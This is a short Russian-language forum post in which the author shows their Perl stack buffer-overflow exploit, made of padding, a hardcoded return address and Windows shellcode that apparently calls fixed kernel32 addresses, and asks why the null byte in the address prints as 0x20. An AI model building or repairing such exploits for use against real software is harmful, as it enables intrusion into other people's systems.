Ладно обясню по подробней.
есть мой exploit на Perl:
#!perl
$Poc = "\x61" x28;
$returnadr = "\x40\xfb\x22\x00";
$shellcode = "\x33\xC0\xB8\x8F".
"\x7A\x83\x7C\x68".
"\x00\x04\x00\x00".
"\x68\x00\x03\x00".
"\x00\xFF\xD0\x33".
"\xC0\xB8\xFA\xCA".
"\x81\x7C\xFF\xD0";
print "$Poc$returnadr$shellcode";.
загвоздка в том што строка "\x40\xfb\x22\x00" должна давать адрес возврата 0022fb40,а она почемуто вместо етаво дайот 2022fb40.
тоесть "\x00" принимаетса за 20 ходя должно приниматса за 00.